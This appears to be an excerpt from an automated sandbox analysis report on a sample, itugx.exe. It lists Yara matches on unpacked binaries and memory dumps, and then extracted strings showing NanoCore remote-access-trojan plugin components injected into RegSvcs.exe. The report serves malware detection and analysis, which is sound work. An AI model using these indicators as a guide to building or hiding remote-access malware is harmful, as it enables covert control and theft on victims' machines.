      Source: Yara matchFile source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499747206.0000000001382000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.573295191.0000000001405000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572597608.000000000143D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544675872.0000000004778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.543882986.00000000019ED000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572853168.00000000013D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.498827487.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.585880095.00000000060B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.519976244.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.499159077.00000000013EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544569868.0000000001984000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500004480.0000000003C6C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572980994.0000000003F04000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522419154.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522729745.0000000000D52000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544269018.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000003.500237895.00000000013B5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.462925300.0000000000D02000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.520896058.0000000000DBB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.521795477.0000000000DEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523166921.0000000003588000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000019.00000003.544903428.00000000019B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000001C.00000003.572167005.000000000143B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.523729347.0000000000D85000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000017.00000003.522501129.0000000000DDB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5920, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 3300, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 4036, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4736, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5928, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5420, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 5552, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: itugx.exe PID: 1712, type: MEMORYSTR
      Source: itugx.exeBinary or memory string: WIN_81
      Source: itugx.exeBinary or memory string: WIN_XP
      Source: itugx.exe, 00000002.00000000.358747295.00000000003D3000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
      Source: itugx.exeBinary or memory string: WIN_XPe
      Source: itugx.exeBinary or memory string: WIN_VISTA
      Source: itugx.exeBinary or memory string: WIN_7
      Source: itugx.exeBinary or memory string: WIN_8

      Remote Access Functionality

      Source: itugx.exe, 00000002.00000003.379717765.0000000000F09000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381511725.0000000000F08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.381281377.0000000003813000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379880100.0000000000F71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.379756044.0000000000F3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380269423.0000000000F40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380361986.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000002.00000003.380642798.0000000000ED4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000003.00000002.580107208.0000000003781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
      Source: itugx.exe, 00000005.00000003.445033484.0000000003E2F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.444608093.0000000001593000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.445168798.00000000015C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442020848.00000000015C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443014017.00000000015FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442280554.00000000015FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.443097060.000000000161A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000005.00000003.442615320.000000000162F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456804036.00000000014C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455090351.00000000014FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.454885906.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456270575.0000000001494000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.456419289.0000000003AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: itugx.exe, 00000010.00000003.455869267.0000000001501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.468974735.0000000004169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedEnvironmentSpecialFolderGetFolderPathPathCombineExceptionDirectoryDirectoryInfoCreateDirectoryFileStreamCreateProjectDataSetProjectErrorClearProjectErrorProcessGetCurrentProcessKillNanoProtectClient.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoProtectClient.dlla[NanoProtect]: Checking for NanoProtect module..
Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: NanoCore.ClientPluginHost
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordA
ttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegSvcs.exe, 00000013.00000002.467749940.0000000003161000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoProtectClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoProtectClientClientPluginResourcesNanoProtectClient.My.ResourcesMySettingsMySettingsPropertyFunctionsNanoProtectClient.NanoProtectMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsGetProtectDirectoryGetProtectFileCreateProtectFileKillNanoCoreSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeLogClientMessageSystem.IOFileExistsReferenceEqualsSystem.ReflectionAssem
